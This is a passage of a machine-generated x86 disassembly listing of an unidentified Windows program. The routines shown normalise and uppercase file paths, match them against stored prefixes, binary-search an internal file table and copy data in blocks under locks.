push [ebp+var_28]
push [ebp+arg_4]
push [ebp+var_20]
call sub_4D600B
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_4D62F9
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_28]
mov [eax], ecx
loc_4D62F9: ; CODE XREF: sub_4D6177+178�j
jmp loc_4D63B6
; ---------------------------------------------------------------------------
loc_4D62FE: ; CODE XREF: sub_4D6177+161�j
and [ebp+var_34], 0
loc_4D6302: ; CODE XREF: sub_4D6177+23A�j
mov eax, [ebp+var_34]
cmp eax, [ebp+var_28]
jnb loc_4D63B6
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
cmp eax, 10000h
jnb short loc_4D6326
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
mov [ebp+var_4C], eax
jmp short loc_4D632D
; ---------------------------------------------------------------------------
loc_4D6326: ; CODE XREF: sub_4D6177+1A2�j
mov [ebp+var_4C], 10000h
loc_4D632D: ; CODE XREF: sub_4D6177+1AD�j
push [ebp+arg_C]
push [ebp+var_4C]
mov eax, [ebp+var_30]
mov eax, [eax+4]
mov ecx, [ebp+var_20]
add eax, [ecx+4]
add eax, [ebp+var_34]
push eax
push [ebp+var_20]
call loc_4D5A10
mov [ebp+var_38], eax
cmp [ebp+var_38], 0
jz short loc_4D637D
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
cmp eax, 10000h
jnb short loc_4D636C
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
mov [ebp+var_50], eax
jmp short loc_4D6373
; ---------------------------------------------------------------------------
loc_4D636C: ; CODE XREF: sub_4D6177+1E8�j
mov [ebp+var_50], 10000h
loc_4D6373: ; CODE XREF: sub_4D6177+1F3�j
mov eax, [ebp+arg_C]
mov eax, [eax]
cmp eax, [ebp+var_50]
jz short loc_4D6383
loc_4D637D: ; CODE XREF: sub_4D6177+1DB�j
and [ebp+var_24], 0
jmp short loc_4D63B6
; ---------------------------------------------------------------------------
loc_4D6383: ; CODE XREF: sub_4D6177+204�j
mov [ebp+var_24], 1
mov eax, [ebp+arg_C]
mov ecx, [eax]
mov esi, [ebp+var_38]
mov edi, [ebp+arg_4]
add edi, [ebp+var_34]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_34]
add ecx, [eax]
mov [ebp+var_34], ecx
jmp loc_4D6302
; ---------------------------------------------------------------------------
loc_4D63B6: ; CODE XREF: sub_4D6177:loc_4D62F9�j
; sub_4D6177+191�j ...
jmp short loc_4D63C5
; ---------------------------------------------------------------------------
loc_4D63B8: ; CODE XREF: sub_4D6177+146�j
; sub_4D6177+150�j
mov [ebp+var_24], 1
mov eax, [ebp+arg_C]
and dword ptr [eax], 0
loc_4D63C5: ; CODE XREF: sub_4D6177:loc_4D63B6�j
cmp [ebp+var_24], 0
jz short loc_4D63DC
mov eax, [ebp+var_20]
mov eax, [eax+4]
mov ecx, [ebp+arg_C]
add eax, [ecx]
mov ecx, [ebp+var_20]
mov [ecx+4], eax
loc_4D63DC: ; CODE XREF: sub_4D6177+252�j
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_24]
mov [eax], ecx
cmp [ebp+arg_10], 0
jz short loc_4D641D
mov eax, [ebp+var_20]
mov eax, [eax+0Ch]
and eax, 40000000h
test eax, eax
jz short loc_4D641D
mov eax, [ebp+var_20]
mov ecx, [ebp+arg_10]
mov ecx, [ecx+0Ch]
mov [eax+4], ecx
mov eax, [ebp+arg_10]
and dword ptr [eax+0Ch], 0
mov eax, [ebp+arg_10]
mov ecx, [ebp+arg_C]
mov ecx, [ecx]
mov [eax+4], ecx
mov eax, [ebp+arg_10]
and dword ptr [eax], 0
loc_4D641D: ; CODE XREF: sub_4D6177+271�j
; sub_4D6177+280�j
push 0FFFFFFFFh
mov [ebp+var_54], 1
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_54]
jmp short loc_4D645F
; ---------------------------------------------------------------------------
loc_4D6436: ; CODE XREF: sub_4D6177+7B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4D6441
jmp short loc_4D645D
sub_4D6177 endp
; =============== S U B R O U T I N E =======================================
sub_4D6441 proc near ; CODE XREF: sub_4D6177+2C3�p
; DATA XREF: _5:004E33D0�o
mov eax, ds:dword_4E68E4
mov [ebp-44h], eax
cmp dword ptr [ebp-44h], 0
jz short locret_4D645C
mov eax, [ebp-44h]
add eax, 10h
push eax
call ds:dword_4E3018 ;; RtlLeaveCriticalSection
locret_4D645C: ; CODE XREF: sub_4D6441+C�j
retn
sub_4D6441 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D6177
loc_4D645D: ; CODE XREF: sub_4D6177+5C�j
; sub_4D6177+2C8�j
xor eax, eax
loc_4D645F: ; CODE XREF: sub_4D6177+D8�j
; sub_4D6177+2BD�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
; END OF FUNCTION CHUNK FOR sub_4D6177
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D6470 proc near ; CODE XREF: sub_4D4252+91�p
; sub_4D653F+B4�p
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], ecx
mov [ebp+var_4], 1
mov [ebp+var_8], 2
jmp short loc_4D6490
; ---------------------------------------------------------------------------
loc_4D6489: ; CODE XREF: sub_4D6470+5E�j
; sub_4D6470+7F�j ...
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_4D6490: ; CODE XREF: sub_4D6470+17�j
mov eax, [ebp+var_8]
cmp eax, [ebp+var_10]
jnb loc_4D6523
mov eax, ds:dword_4E6908
add eax, [ebp+var_8]
mov al, [eax+810h]
mov [ebp+var_C], al
movsx eax, [ebp+var_C]
mov ecx, ds:dword_4E6908
add ecx, [ebp+var_4]
movsx ecx, byte ptr [ecx+810h]
cmp eax, ecx
jnz short loc_4D64D0
movsx eax, [ebp+var_C]
cmp eax, 5Ch
jnz short loc_4D64D0
jmp short loc_4D6489
; ---------------------------------------------------------------------------
loc_4D64D0: ; CODE XREF: sub_4D6470+53�j
; sub_4D6470+5C�j
movsx eax, [ebp+var_C]
cmp eax, 2Fh
jnz short loc_4D64F1
mov eax, ds:dword_4E6908
add eax, [ebp+var_8]
mov byte ptr [eax+810h], 5Ch
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
jmp short loc_4D6489
; ---------------------------------------------------------------------------
loc_4D64F1: ; CODE XREF: sub_4D6470+67�j
mov eax, [ebp+var_4]
inc eax
cmp eax, [ebp+var_8]
jz short loc_4D6517
mov eax, ds:dword_4E6908
add eax, [ebp+var_4]
mov ecx, ds:dword_4E6908
add ecx, [ebp+var_8]
mov cl, [ecx+810h]
mov [eax+811h], cl
loc_4D6517: ; CODE XREF: sub_4D6470+88�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
jmp loc_4D6489
; ---------------------------------------------------------------------------
loc_4D6523: ; CODE XREF: sub_4D6470+26�j
mov eax, ds:dword_4E6908
add eax, [ebp+var_4]
and byte ptr [eax+811h], 0
mov eax, [ebp+var_4]
inc eax
mov ecx, [ebp+var_10]
sub ecx, eax
mov eax, ecx
leave
retn
sub_4D6470 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D653F proc near ; CODE XREF: sub_4D4D24+3A�p
; sub_4D5346+19�p ...
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_56 = byte ptr -56h
var_55 = byte ptr -55h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
; FUNCTION CHUNK AT 004D68BC SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E33D8
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 50h
push ebx
push esi
push edi
cmp [ebp+arg_4], 0
jz short loc_4D6570
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
loc_4D6570: ; CODE XREF: sub_4D653F+29�j
cmp ds:dword_4E6908, 0
jnz short loc_4D6580
xor eax, eax
jmp loc_4D68BE
; ---------------------------------------------------------------------------
loc_4D6580: ; CODE XREF: sub_4D653F+38�j
and [ebp+var_1C], 0
push offset dword_4E68C8
call ds:dword_4E66C4 ;; RtlEnterCriticalSection
and [ebp+var_4], 0
push 4
push offset a? ; "\\\\?\\"
push [ebp+arg_0]
call sub_4D1730
add esp, 0Ch
test eax, eax
jnz short loc_4D65B2
mov eax, [ebp+arg_0]
add eax, 4
mov [ebp+arg_0], eax
loc_4D65B2: ; CODE XREF: sub_4D653F+68�j
lea eax, [ebp+var_1C]
push eax
mov eax, ds:dword_4E6908
add eax, 810h
push eax
push 104h
push [ebp+arg_0]
call ds:dword_4E6708 ;; GetFullPathNameA
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz loc_4D68A5
push [ebp+var_20]
mov eax, ds:dword_4E6908
add eax, 810h
push eax
call ds:dword_4E67C8 ;; CharUpperBuffA
mov ecx, [ebp+var_20]
call sub_4D6470
mov ecx, [ebp+var_1C]
sub ecx, eax
mov [ebp+var_1C], ecx
mov eax, ds:dword_4E6908
mov eax, [eax+0C14h]
mov [ebp+var_24], eax
mov eax, ds:dword_4E6908
mov ecx, [eax+0C14h]
mov edi, ds:dword_4E6908
add edi, 10h
mov esi, ds:dword_4E6908
add esi, 810h
xor eax, eax
repe cmpsb
jz short loc_4D6679
mov eax, ds:dword_4E6908
mov ecx, [eax+0C18h]
mov edi, ds:dword_4E6908
add edi, 410h
mov esi, ds:dword_4E6908
add esi, 810h
xor eax, eax
repe cmpsb
jnz loc_4D681A
mov eax, ds:dword_4E6908
mov eax, [eax+0C18h]
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz loc_4D681A
loc_4D6679: ; CODE XREF: sub_4D653F+F3�j
mov eax, [ebp+var_24]
mov ecx, ds:dword_4E6908
lea eax, [ecx+eax+810h]
mov [ebp+var_28], eax
mov edi, [ebp+var_28]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_34], ecx
mov [ebp+var_38], 1
mov eax, ds:dword_4E6908
mov eax, [eax+0Ch]
mov [ebp+var_2C], eax
and [ebp+var_30], 0
loc_4D66B2: ; CODE XREF: sub_4D653F:loc_4D6752�j
mov eax, [ebp+var_38]
cmp eax, [ebp+var_2C]
ja loc_4D6757
mov eax, [ebp+var_38]
add eax, [ebp+var_2C]
shr eax, 1
mov [ebp+var_44], eax
mov eax, [ebp+var_44]
dec eax
shl eax, 4
mov ecx, ds:dword_4E6908
mov ecx, [ecx+8]
mov eax, [ecx+eax]
mov [ebp+var_3C], eax
push [ebp+var_34]
mov eax, [ebp+var_3C]
push dword ptr [eax]
push [ebp+var_28]
call sub_4D1730
add esp, 0Ch
mov [ebp+var_40], eax
cmp [ebp+var_40], 0
jnz short loc_4D673C
mov eax, [ebp+var_3C]
mov eax, [eax]
mov ecx, [ebp+var_34]
movsx eax, byte ptr [eax+ecx]
test eax, eax
jz short loc_4D671C
mov eax, [ebp+var_3C]
mov eax, [eax]
mov ecx, [ebp+var_34]
movsx eax, byte ptr [eax+ecx]
cmp eax, 5Ch
jnz short loc_4D6733
loc_4D671C: ; CODE XREF: sub_4D653F+1CA�j
mov eax, [ebp+var_44]
dec eax
shl eax, 4
mov ecx, ds:dword_4E6908
mov ecx, [ecx+8]
add ecx, eax
mov [ebp+var_30], ecx
jmp short loc_4D6757
; ---------------------------------------------------------------------------
loc_4D6733: ; CODE XREF: sub_4D653F+1DB�j
mov eax, [ebp+var_44]
dec eax
mov [ebp+var_2C], eax
jmp short loc_4D6752
; ---------------------------------------------------------------------------
loc_4D673C: ; CODE XREF: sub_4D653F+1BA�j
cmp [ebp+var_40], 0
jle short loc_4D674B
mov eax, [ebp+var_44]
inc eax
mov [ebp+var_38], eax
jmp short loc_4D6752
; ---------------------------------------------------------------------------
loc_4D674B: ; CODE XREF: sub_4D653F+201�j
mov eax, [ebp+var_44]
dec eax
mov [ebp+var_2C], eax
loc_4D6752: ; CODE XREF: sub_4D653F+1FB�j
; sub_4D653F+20A�j
jmp loc_4D66B2
; ---------------------------------------------------------------------------
loc_4D6757: ; CODE XREF: sub_4D653F+179�j
; sub_4D653F+1F2�j
cmp [ebp+var_30], 0
jz loc_4D6815
cmp [ebp+arg_4], 0
jz short loc_4D676F
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_30]
mov [eax], ecx
loc_4D676F: ; CODE XREF: sub_4D653F+226�j
mov eax, [ebp+var_30]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_50], eax
mov eax, [ebp+var_28]
mov [ebp+var_54], eax
loc_4D677F: ; CODE XREF: sub_4D653F+272�j
mov eax, [ebp+var_54]
mov al, [eax]
mov [ebp+var_55], al
mov ecx, [ebp+var_50]
cmp al, [ecx]
jnz short loc_4D67B9
cmp [ebp+var_55], 0
jz short loc_4D67B3
mov eax, [ebp+var_54]
mov al, [eax+1]
mov [ebp+var_56], al
mov ecx, [ebp+var_50]
cmp al, [ecx+1]
jnz short loc_4D67B9
add [ebp+var_54], 2
add [ebp+var_50], 2
cmp [ebp+var_56], 0
jnz short loc_4D677F
loc_4D67B3: ; CODE XREF: sub_4D653F+253�j
and [ebp+var_5C], 0
jmp short loc_4D67C1
; ---------------------------------------------------------------------------
loc_4D67B9: ; CODE XREF: sub_4D653F+24D�j
; sub_4D653F+264�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_5C], eax
loc_4D67C1: ; CODE XREF: sub_4D653F+278�j
mov eax, [ebp+var_5C]
mov [ebp+var_60], eax
cmp [ebp+var_60], 0
jnz short loc_4D67D5
mov eax, [ebp+arg_8]
and byte ptr [eax], 0
jmp short loc_4D67DB
; ---------------------------------------------------------------------------
loc_4D67D5: ; CODE XREF: sub_4D653F+28C�j
mov eax, [ebp+arg_8]
mov byte ptr [eax], 1
loc_4D67DB: ; CODE XREF: sub_4D653F+294�j
cmp [ebp+arg_C], 0
jz short loc_4D67FA
push 0
mov eax, ds:dword_4E6908
add eax, 810h
push eax
call sub_4DE2CA
pop ecx
pop ecx
mov ecx, [ebp+arg_C]
mov [ecx], eax
loc_4D67FA: ; CODE XREF: sub_4D653F+2A0�j
push 0FFFFFFFFh
mov eax, [ebp+var_30]
mov [ebp+var_64], eax
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_64]
jmp loc_4D68BE
; ---------------------------------------------------------------------------
loc_4D6815: ; CODE XREF: sub_4D653F+21C�j
jmp loc_4D68A5
; ---------------------------------------------------------------------------
loc_4D681A: ; CODE XREF: sub_4D653F+11C�j
; sub_4D653F+134�j
push [ebp+var_1C]
call sub_4DDA16
pop ecx
mov [ebp+var_48], eax
cmp [ebp+var_48], 0
jz short loc_4D68A5
mov eax, ds:dword_4E6908
mov eax, [eax+8]
cmp eax, [ebp+var_48]
ja short loc_4D68A5
mov eax, ds:dword_4E6908
mov eax, [eax+0Ch]
shl eax, 4
mov ecx, ds:dword_4E6908
mov ecx, [ecx+8]
add ecx, eax
cmp [ebp+var_48], ecx
jnb short loc_4D68A5
mov eax, [ebp+var_48]
mov [ebp+var_4C], eax
mov eax, [ebp+arg_8]
and byte ptr [eax], 0
cmp [ebp+arg_C], 0
jz short loc_4D687F
push 0
mov eax, ds:dword_4E6908
add eax, 810h
push eax
call sub_4DE2CA
pop ecx
pop ecx
mov ecx, [ebp+arg_C]
mov [ecx], eax
loc_4D687F: ; CODE XREF: sub_4D653F+325�j
cmp [ebp+arg_4], 0
jz short loc_4D688D
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4C]
mov [eax], ecx
loc_4D688D: ; CODE XREF: sub_4D653F+344�j
push 0FFFFFFFFh
mov eax, [ebp+var_48]
mov [ebp+var_68], eax
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_68]
jmp short loc_4D68BE
; ---------------------------------------------------------------------------
loc_4D68A5: ; CODE XREF: sub_4D653F+97�j
; sub_4D653F:loc_4D6815�j ...
or [ebp+var_4], 0FFFFFFFFh
call sub_4D68B0
jmp short loc_4D68BC
sub_4D653F endp
; =============== S U B R O U T I N E =======================================
sub_4D68B0 proc near ; CODE XREF: sub_4D653F+36A�p
; DATA XREF: _5:004E33E0�o
push offset dword_4E68C8
call ds:dword_4E6754 ;; RtlLeaveCriticalSection
retn
sub_4D68B0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D653F
loc_4D68BC: ; CODE XREF: sub_4D653F+36F�j
xor eax, eax
loc_4D68BE: ; CODE XREF: sub_4D653F+3C�j
; sub_4D653F+2D1�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 10h
; END OF FUNCTION CHUNK FOR sub_4D653F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D68CF proc near ; CODE XREF: _4:004DFB01�p _4:004DFBD4�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
and [ebp+var_C], 0
and [ebp+var_8], 0
push 0
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
push [ebp+arg_0]
call sub_4D653F
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz loc_4D69C6
movzx eax, [ebp+var_C]
test eax, eax
jnz loc_4D69C6
cmp [ebp+var_8], 0
jz loc_4D69C6
mov eax, [ebp+var_8]
mov edi, [eax+4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_10], ecx
mov eax, ds:dword_4E6908
mov eax, [eax+0C14h]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+1]
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
cmp eax, [ebp+arg_8]
jle short loc_4D694F
mov eax, [ebp+var_14]
inc eax
mov ecx, [ebp+arg_C]
mov [ecx], eax
jmp short loc_4D69C1
; ---------------------------------------------------------------------------
loc_4D694F: ; CODE XREF: sub_4D68CF+73�j
mov eax, ds:dword_4E6908
mov ecx, [eax+0C14h]
mov esi, ds:dword_4E6908
add esi, 10h
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+var_10]
mov eax, [ebp+var_8]
mov esi, [eax+4]
mov eax, ds:dword_4E6908
mov edi, [ebp+arg_4]
add edi, [eax+0C14h]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, ds:dword_4E6908
mov eax, [eax+0C14h]
add eax, [ebp+var_10]
mov ecx, [ebp+arg_4]
and byte ptr [ecx+eax], 0
mov eax, ds:dword_4E6908
mov eax, [eax+0C14h]
add eax, [ebp+var_10]
mov ecx, [ebp+arg_C]
mov [ecx], eax
loc_4D69C1: ; CODE XREF: sub_4D68CF+7E�j
push 1
pop eax
jmp short loc_4D69CE
; ---------------------------------------------------------------------------
loc_4D69C6: ; CODE XREF: sub_4D68CF+29�j
; sub_4D68CF+35�j ...
mov eax, [ebp+arg_C]
and dword ptr [eax], 0
xor eax, eax
loc_4D69CE: ; CODE XREF: sub_4D68CF+F5�j
pop edi
pop esi
leave
retn
sub_4D68CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D69D2 proc near ; CODE XREF: sub_4DA81E+3D�p
; sub_4DF1C7+29�p ...
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 004D6A9F SIZE 00000043 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E33E8
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_34], edx
mov [ebp+var_30], ecx
push [ebp+var_34]
lea eax, [ebp+var_20]
push eax
push 0
push [ebp+var_30]
call sub_4D653F
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jnz loc_4D6A9F
cmp [ebp+arg_0], 0
jz short loc_4D6A9F
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx
push [ebp+var_30]
call sub_4DE2CA
pop ecx
pop ecx
mov edx, eax
mov edi, esi
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov ebx, ecx
mov edi, edx
mov edx, edi
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
dec edi
mov ecx, ebx
shr ecx, 2
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov [ebp+var_24], edx
and [ebp+var_4], 0
push [ebp+var_34]
lea eax, [ebp+var_20]
push eax
push 0
push [ebp+var_24]
call sub_4D653F
mov [ebp+var_1C], eax
or [ebp+var_4], 0FFFFFFFFh
call sub_4D6A8F
jmp short loc_4D6A9F
sub_4D69D2 endp
; =============== S U B R O U T I N E =======================================
sub_4D6A8F proc near ; CODE XREF: sub_4D69D2+B6�p
; DATA XREF: _5:004E33F0�o
mov eax, [ebp-24h]
mov [ebp-28h], eax
push dword ptr [ebp-28h]
call sub_4DD3DD
pop ecx
retn
sub_4D6A8F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D69D2
loc_4D6A9F: ; CODE XREF: sub_4D69D2+43�j
; sub_4D69D2+4D�j ...
cmp [ebp+var_1C], 0
jz short loc_4D6AB2
movzx eax, [ebp+var_20]
test eax, eax
jnz short loc_4D6AB2
mov eax, [ebp+var_1C]
jmp short loc_4D6AD1
; ---------------------------------------------------------------------------
loc_4D6AB2: ; CODE XREF: sub_4D69D2+D1�j
; sub_4D69D2+D9�j
cmp [ebp+var_34], 0
jz short loc_4D6ACF
cmp [ebp+var_1C], 0
jz short loc_4D6ACF
mov eax, [ebp+var_34]
mov eax, [eax]
mov [ebp+var_2C], eax
push [ebp+var_2C]
call sub_4DD3DD
pop ecx
loc_4D6ACF: ; CODE XREF: sub_4D69D2+E4�j
; sub_4D69D2+EA�j
xor eax, eax
loc_4D6AD1: ; CODE XREF: sub_4D69D2+DE�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
; END OF FUNCTION CHUNK FOR sub_4D69D2
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D6AE2 proc near ; CODE XREF: sub_4DA81E+24�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
mov [ebp+var_28], edx
mov [ebp+var_24], ecx
and [ebp+var_8], 0
cmp [ebp+var_24], 0
jz loc_4D6BBB
mov eax, [ebp+var_24]
movsx eax, byte ptr [eax]
cmp eax, 5Ch
jz loc_4D6BBB
mov eax, [ebp+var_24]
movsx eax, byte ptr [eax]
cmp eax, 2Fh
jz loc_4D6BBB
mov eax, [ebp+var_24]
movsx eax, byte ptr [eax+1]
cmp eax, 3Ah
jz loc_4D6BBB
mov edi, [ebp+var_24]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_14], ecx
mov eax, ds:dword_4E6908
add eax, 10h
mov ecx, ds:dword_4E6908
mov ecx, [ecx+0C10h]
sub ecx, eax
mov [ebp+var_10], ecx
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov eax, [ebp+var_14]
lea eax, [eax+ecx+104h]
push eax
call sub_4DD35A
pop ecx
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov [ebp+var_8], eax
mov ecx, [ebp+var_10]
mov esi, ds:dword_4E6908
add esi, 10h
mov edi, [ebp+var_8]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+var_14]
inc ecx
mov esi, [ebp+var_24]
mov edi, [ebp+var_8]
add edi, [ebp+var_10]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_8]
mov [ebp+var_24], eax
loc_4D6BBB: ; CODE XREF: sub_4D6AE2+17�j
; sub_4D6AE2+26�j ...
push 0
lea eax, [ebp+var_C]
push eax
push 0
push [ebp+var_24]
call sub_4D653F
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4D6C41
cmp [ebp+arg_0], 0
jz short loc_4D6C41
cmp [ebp+var_8], 0
jnz short loc_4D6BFB
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx
push [ebp+var_24]
call sub_4DE2CA
pop ecx
pop ecx
mov [ebp+var_8], eax
loc_4D6BFB: ; CODE XREF: sub_4D6AE2+FC�j
mov edi, [ebp+arg_0]
mov edx, [ebp+var_8]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov ebx, ecx
mov edi, edx
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
dec edi
mov ecx, ebx
shr ecx, 2
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov eax, [ebp+var_8]
mov [ebp+var_24], eax
push 0
lea eax, [ebp+var_C]
push eax
push 0
push [ebp+var_8]
call sub_4D653F
mov [ebp+var_4], eax
loc_4D6C41: ; CODE XREF: sub_4D6AE2+F0�j
; sub_4D6AE2+F6�j
cmp [ebp+var_4], 0
jz short loc_4D6C90
movzx eax, [ebp+var_C]
test eax, eax
jnz short loc_4D6C90
cmp [ebp+var_28], 0
jz short loc_4D6C7C
cmp [ebp+var_8], 0
jz short loc_4D6C63
mov eax, [ebp+var_8]
mov [ebp+var_2C], eax
jmp short loc_4D6C72
; ---------------------------------------------------------------------------
loc_4D6C63: ; CODE XREF: sub_4D6AE2+177�j
push 0
push [ebp+var_24]
call sub_4DE2CA
pop ecx
pop ecx
mov [ebp+var_2C], eax
loc_4D6C72: ; CODE XREF: sub_4D6AE2+17F�j
mov eax, [ebp+var_28]
mov ecx, [ebp+var_2C]
mov [eax], ecx
jmp short loc_4D6C8B
; ---------------------------------------------------------------------------
loc_4D6C7C: ; CODE XREF: sub_4D6AE2+171�j
mov eax, [ebp+var_8]
mov [ebp+var_1C], eax
push [ebp+var_1C]
call sub_4DD3DD
pop ecx
loc_4D6C8B: ; CODE XREF: sub_4D6AE2+198�j
mov eax, [ebp+var_4]
jmp short loc_4D6CA1
; ---------------------------------------------------------------------------
loc_4D6C90: ; CODE XREF: sub_4D6AE2+163�j
; sub_4D6AE2+16B�j
mov eax, [ebp+var_8]
mov [ebp+var_20], eax
push [ebp+var_20]
call sub_4DD3DD
pop ecx
xor eax, eax
loc_4D6CA1: ; CODE XREF: sub_4D6AE2+1AC�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_4D6AE2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D6CA8 proc near ; CODE XREF: sub_4DF7AF+A�p
; sub_4DF7DD+78�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], edx
mov [ebp+var_4], ecx
push 0
push [ebp+var_8]
push 0
push [ebp+var_4]
call sub_4D653F
leave
retn
sub_4D6CA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D6CC4 proc near ; CODE XREF: sub_4DFC66+2B�p
; _4:004DFD4E�p ...
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
